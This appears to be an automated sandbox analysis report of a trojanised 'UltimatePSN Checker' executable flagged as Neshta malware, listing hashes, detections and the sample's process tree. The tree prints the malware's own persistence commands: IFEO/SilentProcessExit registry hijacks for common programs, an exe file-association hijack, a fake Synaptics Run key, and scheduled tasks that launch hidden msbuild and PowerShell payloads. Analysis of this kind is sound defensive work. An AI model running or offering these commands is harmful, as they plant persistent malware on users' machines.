neshta | 06361aaa349839a3ba17de32f86e1219ef89815bfce5c45c005bc32657dd8d0b

Analysis

max time kernel
11s
max time network
33s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
23-04-2023 11:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

UltimatePSN Checker v1.2 Updated/UltimatePSN Checker v1.2.exe
Size

1.7MB
MD5

2311324a67e80be453e3e37c65548848
SHA1

9291ca23bb88a9cb912dba77c7b9ac2ec8d77008
SHA256

8fab15bad9b03141589b331b6c5e142450d73fff9025987038108103c020d5d3
SHA512

fdabf0ab09ba736dd87cf4c41ec18090cfab380acbce734c6b54b00249177136bad0697bf7065b31b1a68c2b519bbd9e0f6b91bf99cd39fac4c87dd2bc3b2041
SSDEEP

24576:znsJ39LyjbJkQFMhmC+6GD9dnBEsRybcR4I4x2eM:znsHyjtk2MYC5GDTBEsRycz

Score

10^/10

neshta agilenet persistence spyware

Malware Config

Signatures

Detect Neshta payload 51 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe	family_neshta
C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe	family_neshta
C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe	family_neshta
C:\ProgramData\Synaptics\Synaptics.exe	family_neshta
C:\ProgramData\Synaptics\Synaptics.exe	family_neshta
C:\ProgramData\Synaptics\Synaptics.exe	family_neshta
behavioral2/memory/4404-243-0x0000000000400000-0x00000000005B4000-memory.dmp	family_neshta
C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_Synaptics.exe	family_neshta
C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_Synaptics.exe	family_neshta
C:\odt\OFFICE~1.EXE	family_neshta
C:\Windows\svchost.com	family_neshta
C:\Windows\svchost.com	family_neshta
behavioral2/memory/3972-293-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	family_neshta
C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	family_neshta
behavioral2/memory/3320-454-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	family_neshta
C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13173~1.45\MI391D~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13173~1.45\MICROS~1.EXE	family_neshta
C:\PROGRA~2\MOZILL~1\UNINST~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\EDGEUP~1\13173~1.45\MICROS~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	family_neshta
C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	family_neshta
C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	family_neshta
C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\181510~1.001\FILESY~1.EXE	family_neshta
C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\OneDrive.exe	family_neshta
C:\Users\ALLUSE~1\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	family_neshta
C:\Users\ALLUSE~1\Adobe\Setup\{AC76B~1\setup.exe	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	family_neshta
behavioral2/memory/2336-566-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{CA675~1\VCREDI~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{61087~1\VCREDI~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{57A73~1\VC_RED~1.EXE	family_neshta
C:\Users\ALLUSE~1\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	family_neshta
C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\ONEDRI~1.EXE	family_neshta
behavioral2/memory/3420-545-0x0000000000400000-0x00000000005B4000-memory.dmp	family_neshta
C:\Users\Admin\AppData\Local\MICROS~1\OneDrive\181510~1.001\FILECO~1.EXE	family_neshta
behavioral2/memory/3320-594-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/3420-595-0x0000000000400000-0x00000000005B4000-memory.dmp	family_neshta
behavioral2/memory/2336-598-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

UltimatePSN Checker v1.2.exe._cache_UltimatePSN Checker v1.2.exeSynaptics.exe._cache_Synaptics.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	UltimatePSN Checker v1.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	._cache_UltimatePSN Checker v1.2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	Synaptics.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	._cache_Synaptics.exe

Executes dropped EXE 6 IoCs

Processes:

._cache_UltimatePSN Checker v1.2.exe._cache_UltimatePSN Checker v1.2.exeSynaptics.exe._cache_Synaptics.exesvchost.com_CACHE~1.EXE

pid	process
3320	._cache_UltimatePSN Checker v1.2.exe
2804	._cache_UltimatePSN Checker v1.2.exe
3420	Synaptics.exe
2336	._cache_Synaptics.exe
3972	svchost.com
316	_CACHE~1.EXE

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

Processes:

._cache_UltimatePSN Checker v1.2.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	._cache_UltimatePSN Checker v1.2.exe

Obfuscated with Agile.Net obfuscator 6 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
C:\Users\Admin\Link\playstation.cer	agile_net
C:\Users\Admin\Link\playstation.cer	agile_net
C:\Users\Admin\Link\playstation.cer	agile_net
behavioral2/memory/4984-569-0x0000000000400000-0x0000000000BA2000-memory.dmp	agile_net
behavioral2/memory/4984-568-0x0000000000400000-0x0000000000B04000-memory.dmp	agile_net
behavioral2/memory/3600-580-0x0000000000400000-0x0000000000BA2000-memory.dmp	agile_net

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

UltimatePSN Checker v1.2.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe"	UltimatePSN Checker v1.2.exe

Drops file in Program Files directory 23 IoCs

Processes:

._cache_UltimatePSN Checker v1.2.exe._cache_Synaptics.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	._cache_Synaptics.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	._cache_Synaptics.exe

Drops file in Windows directory 4 IoCs

Processes:

._cache_UltimatePSN Checker v1.2.exe._cache_Synaptics.exesvchost.com

description	ioc	process
File opened for modification	C:\Windows\svchost.com	._cache_UltimatePSN Checker v1.2.exe
File opened for modification	C:\Windows\svchost.com	._cache_Synaptics.exe
File opened for modification	C:\Windows\directx.sys	svchost.com
File opened for modification	C:\Windows\svchost.com	svchost.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3012 4984 WerFault.exe UltimatePSN Checker v1.1.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

3800 schtasks.exe
4780 schtasks.exe
3740 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1064 timeout.exe
5068 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

4616 taskkill.exe

pid	pid_target	process	target process
3012	4984	WerFault.exe	UltimatePSN Checker v1.1.exe

pid	process
3800	schtasks.exe
4780	schtasks.exe
3740	schtasks.exe

pid	process
1064	timeout.exe
5068	timeout.exe

pid	process
4616	taskkill.exe

Modifies registry class 4 IoCs

Processes:

UltimatePSN Checker v1.2.exe._cache_UltimatePSN Checker v1.2.exeSynaptics.exe._cache_Synaptics.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	UltimatePSN Checker v1.2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	._cache_UltimatePSN Checker v1.2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Synaptics.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings	._cache_Synaptics.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.execmd.exe

pid process

3224 powershell.exe
3224 powershell.exe
1888 cmd.exe
1888 cmd.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.execmd.exe

description pid process

Token: SeDebugPrivilege 3224 powershell.exe
Token: SeDebugPrivilege 1888 cmd.exe

pid	process
3224	powershell.exe
3224	powershell.exe
1888	cmd.exe
1888	cmd.exe

description	pid	process
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	1888	cmd.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

UltimatePSN Checker v1.2.exe._cache_UltimatePSN Checker v1.2.exe._cache_UltimatePSN Checker v1.2.execmd.execmd.execmd.exeSynaptics.exe._cache_Synaptics.exesvchost.com_CACHE~1.EXEcmd.execmd.execmd.exepowershell.execmd.exe

description	pid	process	target process
PID 4404 wrote to memory of 3320	4404	UltimatePSN Checker v1.2.exe	._cache_UltimatePSN Checker v1.2.exe
PID 4404 wrote to memory of 3320	4404	UltimatePSN Checker v1.2.exe	._cache_UltimatePSN Checker v1.2.exe
PID 4404 wrote to memory of 3320	4404	UltimatePSN Checker v1.2.exe	._cache_UltimatePSN Checker v1.2.exe
PID 3320 wrote to memory of 2804	3320	._cache_UltimatePSN Checker v1.2.exe	._cache_UltimatePSN Checker v1.2.exe
PID 3320 wrote to memory of 2804	3320	._cache_UltimatePSN Checker v1.2.exe	._cache_UltimatePSN Checker v1.2.exe
PID 4404 wrote to memory of 3420	4404	UltimatePSN Checker v1.2.exe	Synaptics.exe
PID 4404 wrote to memory of 3420	4404	UltimatePSN Checker v1.2.exe	Synaptics.exe
PID 4404 wrote to memory of 3420	4404	UltimatePSN Checker v1.2.exe	Synaptics.exe
PID 2804 wrote to memory of 3352	2804	._cache_UltimatePSN Checker v1.2.exe	cmd.exe
PID 2804 wrote to memory of 3352	2804	._cache_UltimatePSN Checker v1.2.exe	cmd.exe
PID 3352 wrote to memory of 3364	3352	cmd.exe	cmd.exe
PID 3352 wrote to memory of 3364	3352	cmd.exe	cmd.exe
PID 3364 wrote to memory of 3712	3364	cmd.exe	cmd.exe
PID 3364 wrote to memory of 3712	3364	cmd.exe	cmd.exe
PID 3712 wrote to memory of 1892	3712	cmd.exe	attrib.exe
PID 3712 wrote to memory of 1892	3712	cmd.exe	attrib.exe
PID 3420 wrote to memory of 2336	3420	Synaptics.exe	._cache_Synaptics.exe
PID 3420 wrote to memory of 2336	3420	Synaptics.exe	._cache_Synaptics.exe
PID 3420 wrote to memory of 2336	3420	Synaptics.exe	._cache_Synaptics.exe
PID 2336 wrote to memory of 3972	2336	._cache_Synaptics.exe	svchost.com
PID 2336 wrote to memory of 3972	2336	._cache_Synaptics.exe	svchost.com
PID 2336 wrote to memory of 3972	2336	._cache_Synaptics.exe	svchost.com
PID 3972 wrote to memory of 316	3972	svchost.com	_CACHE~1.EXE
PID 3972 wrote to memory of 316	3972	svchost.com	_CACHE~1.EXE
PID 316 wrote to memory of 3276	316	_CACHE~1.EXE	cmd.exe
PID 316 wrote to memory of 3276	316	_CACHE~1.EXE	cmd.exe
PID 3276 wrote to memory of 4896	3276	cmd.exe	cmd.exe
PID 3276 wrote to memory of 4896	3276	cmd.exe	cmd.exe
PID 4896 wrote to memory of 4980	4896	cmd.exe	cmd.exe
PID 4896 wrote to memory of 4980	4896	cmd.exe	cmd.exe
PID 4980 wrote to memory of 3636	4980	cmd.exe	attrib.exe
PID 4980 wrote to memory of 3636	4980	cmd.exe	attrib.exe
PID 3712 wrote to memory of 4984	3712	cmd.exe	UltimatePSN Checker v1.1.exe
PID 3712 wrote to memory of 4984	3712	cmd.exe	UltimatePSN Checker v1.1.exe
PID 3712 wrote to memory of 3224	3712	cmd.exe	powershell.exe
PID 3712 wrote to memory of 3224	3712	cmd.exe	powershell.exe
PID 4980 wrote to memory of 1012	4980	cmd.exe	xcopy.exe
PID 4980 wrote to memory of 1012	4980	cmd.exe	xcopy.exe
PID 4980 wrote to memory of 1888	4980	cmd.exe	cmd.exe
PID 4980 wrote to memory of 1888	4980	cmd.exe	cmd.exe
PID 3224 wrote to memory of 3392	3224	powershell.exe	cmd.exe
PID 3224 wrote to memory of 3392	3224	powershell.exe	cmd.exe
PID 1888 wrote to memory of 4068	1888	cmd.exe	cmd.exe
PID 1888 wrote to memory of 4068	1888	cmd.exe	cmd.exe
PID 3712 wrote to memory of 348	3712	cmd.exe	reg.exe
PID 3712 wrote to memory of 348	3712	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1892 attrib.exe
3636 attrib.exe

pid	process
1892	attrib.exe
3636	attrib.exe

C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\UltimatePSN Checker v1.2.exe
"C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\UltimatePSN Checker v1.2.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4404

C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe
"C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3320

C:\Users\Admin\AppData\Local\Temp\3582-490\._cache_UltimatePSN Checker v1.2.exe
"C:\Users\Admin\AppData\Local\Temp\3582-490\._cache_UltimatePSN Checker v1.2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cd Data & ren deploy.dll deploy.bat & cmd /c start /min deploy.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:3352

C:\Windows\system32\cmd.exe
cmd /c start /min deploy.bat
5⤵
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K deploy.bat
6⤵
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\Link /s /d
7⤵
- Views/modifies file attributes
PID:1892

C:\Windows\system32\xcopy.exe
xcopy resource C:\Users\Admin\Link /y /e
7⤵
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren input.dll input.ps1
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3224

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren input.dll input.ps1
8⤵
PID:3392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren setup.dll setup.bat
7⤵
PID:348

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren setup.dll setup.bat
8⤵
PID:2724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren st.dll st.vbs
7⤵
PID:696

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren st.dll st.vbs
8⤵
PID:3652

C:\Windows\system32\cmd.exe
cmd /c ren "playstation.cer" "UltimatePSN Checker v1.1.exe"
7⤵
PID:4504

C:\Windows\system32\timeout.exe
timeout 3
7⤵
- Delays execution with timeout.exe
PID:1064

C:\Windows\system32\cmd.exe
cmd /c start /max launcher.bat
7⤵
PID:1876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K launcher.bat
8⤵
PID:2876

C:\Users\Admin\Link\UltimatePSN Checker v1.1.exe
"UltimatePSN Checker v1.1.exe"
9⤵
PID:3600

C:\Windows\system32\wscript.exe
wscript.exe st.vbs
7⤵
PID:3760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Link\setup.bat" "
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
9⤵
PID:2724

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
9⤵
PID:4312

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Taskmgr.exe" /v ReportingMode /t REG_DWORD /d 1 /f
9⤵
PID:856

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Taskmgr.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f
9⤵
PID:348

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
9⤵
PID:5080

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 /f
9⤵
PID:2308

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "cmd /c start /min powershell.exe -ExecutionPolicy Bypass -nop -w 1 C:\Users\Admin\link\input.ps1" /f
9⤵
PID:4128

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WINWORD.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
9⤵
PID:1972

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\WINWORD.exe" /v ReportingMode /t REG_DWORD /d 1 /f
9⤵
PID:2672

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\WINWORD.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f
9⤵
PID:4300

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
9⤵
PID:2484

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\chrome.exe" /v ReportingMode /t REG_DWORD /d 1 /f
9⤵
PID:2512

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\chrome.exe" /v MonitorProcess /d "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /f
9⤵
PID:4528

C:\Windows\system32\schtasks.exe
schtasks /create /tn "SecurityHealthe" /tr "cmd /c start /min C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Users\Admin\link\config.png" /sc minute /mo 20 /F
9⤵
- Creates scheduled task(s)
PID:3800

C:\Windows\system32\schtasks.exe
schtasks /create /tn "CreateExplorer" /tr "cmd /c start /min powershell.exe -ExecutionPolicy Bypass -nop -w 1 C:\Users\Admin\link\input.ps1" /sc minute /mo 25 /F
9⤵
- Creates scheduled task(s)
PID:4780

C:\Windows\system32\taskkill.exe
taskkill /IM cmd.exe /F
9⤵
- Kills process with taskkill
PID:4616

C:\ProgramData\Synaptics\Synaptics.exe
"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3420

C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_Synaptics.exe
"C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_Synaptics.exe" InjUpdate
3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\svchost.com
"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\_CACHE~1.EXE" InjUpdate
4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3972

C:\Users\Admin\AppData\Local\Temp\3582-490\_CACHE~1.EXE
C:\Users\Admin\AppData\Local\Temp\3582-490\_CACHE~1.EXE InjUpdate
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cd Data & ren deploy.dll deploy.bat & cmd /c start /min deploy.bat
6⤵
- Suspicious use of WriteProcessMemory
PID:3276

C:\Windows\system32\cmd.exe
cmd /c start /min deploy.bat
7⤵
- Suspicious use of WriteProcessMemory
PID:4896

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K deploy.bat
8⤵
- Suspicious use of WriteProcessMemory
PID:4980

C:\Windows\system32\attrib.exe
attrib +h C:\Users\Admin\Link /s /d
9⤵
- Views/modifies file attributes
PID:3636

C:\Windows\system32\xcopy.exe
xcopy resource C:\Users\Admin\Link /y /e
9⤵
PID:1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren input.dll input.ps1
9⤵
PID:1888

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren input.dll input.ps1
10⤵
PID:4068

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren setup.dll setup.bat
9⤵
PID:2208

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren setup.dll setup.bat
10⤵
PID:1748

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden cmd /c ren st.dll st.vbs
9⤵
PID:3092

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c ren st.dll st.vbs
10⤵
PID:1492

C:\Windows\system32\cmd.exe
cmd /c ren "playstation.cer" "UltimatePSN Checker v1.1.exe"
9⤵
PID:3744

C:\Windows\system32\timeout.exe
timeout 3
9⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\system32\cmd.exe
cmd /c start /max launcher.bat
9⤵
PID:4412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K launcher.bat
10⤵
PID:3820

C:\Users\Admin\Link\UltimatePSN Checker v1.1.exe
"UltimatePSN Checker v1.1.exe"
11⤵
PID:4984

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4984 -s 1168
12⤵
- Program crash
PID:3012

C:\Windows\system32\wscript.exe
wscript.exe st.vbs
9⤵
PID:4844

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Link\setup.bat" "
10⤵
PID:1060

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
11⤵
PID:5092

